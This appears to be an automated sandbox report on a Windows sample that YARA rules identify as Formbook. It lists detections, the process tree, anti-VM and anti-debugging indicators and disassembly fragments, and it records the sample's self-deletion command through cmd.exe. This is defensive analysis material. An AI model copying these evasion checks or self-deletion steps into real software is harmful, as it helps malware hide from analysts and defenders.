Source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: V5cfxBHd71.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@9/3

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\V5cfxBHd71.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01

Source: V5cfxBHd71.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: V5cfxBHd71.exe	Virustotal: Detection: 29%
Source: V5cfxBHd71.exe	ReversingLabs: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\V5cfxBHd71.exe 'C:\Users\user\Desktop\V5cfxBHd71.exe'
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Users\user\Desktop\V5cfxBHd71.exe C:\Users\user\Desktop\V5cfxBHd71.exe	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'	Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: V5cfxBHd71.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: V5cfxBHd71.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: V5cfxBHd71.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
Source:	Binary string: msdt.pdbGCTL source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp, msdt.exe
Source:	Binary string: msdt.pdb source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp

Source: V5cfxBHd71.exe

Static PE information: 0xF0944DD6 [Mon Nov 25 20:51:34 2097 UTC]

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B2A2 push cs; ret	4_2_0041B2A3
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B3F2 push eax; ret	4_2_0041B3F8
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B3FB push eax; ret	4_2_0041B462
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B3A5 push eax; ret	4_2_0041B3F8
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041B45C push eax; ret	4_2_0041B462
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00415414 push esp; ret	4_2_00415416
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00414F46 push cs; ret	4_2_00414F47
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret	4_2_0041C1FF
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4_2_00415FC5 push ebp; ret	4_2_00415FC6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D5D0D1 push ecx; ret	17_2_04D5D0E4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B2A2 push cs; ret	17_2_00A5B2A3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B3A5 push eax; ret	17_2_00A5B3F8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B3F2 push eax; ret	17_2_00A5B3F8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B3FB push eax; ret	17_2_00A5B462
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A55414 push esp; ret	17_2_00A55416
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5B45C push eax; ret	17_2_00A5B462
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A55FC5 push ebp; ret	17_2_00A55FC6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A5BF12 push dword ptr [8427D5C5h]; ret	17_2_00A5C1FF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_00A54F46 push cs; ret	17_2_00A54F47

Source: initial sample

Static PE information: section name: .text entropy: 7.40347651298

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: V5cfxBHd71.exe PID: 5700, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000000A485E4 second address: 0000000000A485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000000A4896E second address: 0000000000A48974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Code function: 4_2_004088A0 rdtsc

4_2_004088A0

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe TID: 5332	Thread sleep time: -40589s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe TID: 456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4656	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Thread delayed: delay time: 40589			Jump to behavior
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000007.00000000.262044183.0000000001218000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oso
Source: explorer.exe, 00000007.00000000.287538157.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.288154074.0000000008AEA000.00000004.00000001.sdmp	Binary or memory string: 000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.299978038.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.287622387.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000007.00000000.317506996.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000007.00000000.287622387.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: V5cfxBHd71.exe, 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Code function: 4_2_004088A0 rdtsc

4_2_004088A0

Source: C:\Users\user\Desktop\V5cfxBHd71.exe

Code function: 4_2_00409B10 LdrLoadDll,

4_2_00409B10

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD8CD6 mov eax, dword ptr fs:[00000030h]	17_2_04DD8CD6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD8ED6 mov eax, dword ptr fs:[00000030h]	17_2_04DD8ED6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DBFEC0 mov eax, dword ptr fs:[00000030h]	17_2_04DBFEC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D336CC mov eax, dword ptr fs:[00000030h]	17_2_04D336CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC14FB mov eax, dword ptr fs:[00000030h]	17_2_04DC14FB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D316E0 mov ecx, dword ptr fs:[00000030h]	17_2_04D316E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3D294 mov eax, dword ptr fs:[00000030h]	17_2_04D3D294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3D294 mov eax, dword ptr fs:[00000030h]	17_2_04D3D294
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09080 mov eax, dword ptr fs:[00000030h]	17_2_04D09080
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D9FE87 mov eax, dword ptr fs:[00000030h]	17_2_04D9FE87
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3F0BF mov ecx, dword ptr fs:[00000030h]	17_2_04D3F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3F0BF mov eax, dword ptr fs:[00000030h]	17_2_04D3F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D3F0BF mov eax, dword ptr fs:[00000030h]	17_2_04D3F0BF
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]	17_2_04D052A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]	17_2_04D052A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]	17_2_04D052A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]	17_2_04D052A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D052A5 mov eax, dword ptr fs:[00000030h]	17_2_04D052A5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]	17_2_04DD0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]	17_2_04DD0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD0EA5 mov eax, dword ptr fs:[00000030h]	17_2_04DD0EA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D846A7 mov eax, dword ptr fs:[00000030h]	17_2_04D846A7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]	17_2_04D09240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]	17_2_04D09240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]	17_2_04D09240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D09240 mov eax, dword ptr fs:[00000030h]	17_2_04D09240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DD1074 mov eax, dword ptr fs:[00000030h]	17_2_04DD1074
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC2073 mov eax, dword ptr fs:[00000030h]	17_2_04DC2073
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DBB260 mov eax, dword ptr fs:[00000030h]	17_2_04DBB260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DBB260 mov eax, dword ptr fs:[00000030h]	17_2_04DBB260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D2746D mov eax, dword ptr fs:[00000030h]	17_2_04D2746D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]	17_2_04D87016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]	17_2_04D87016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04D87016 mov eax, dword ptr fs:[00000030h]	17_2_04D87016
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DC1C06 mov eax, dword ptr fs:[00000030h]	17_2_04DC1C06
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 17_2_04DBFE3F mov eax, dword ptr fs:[00000030h]	17_2_04DBFE3F
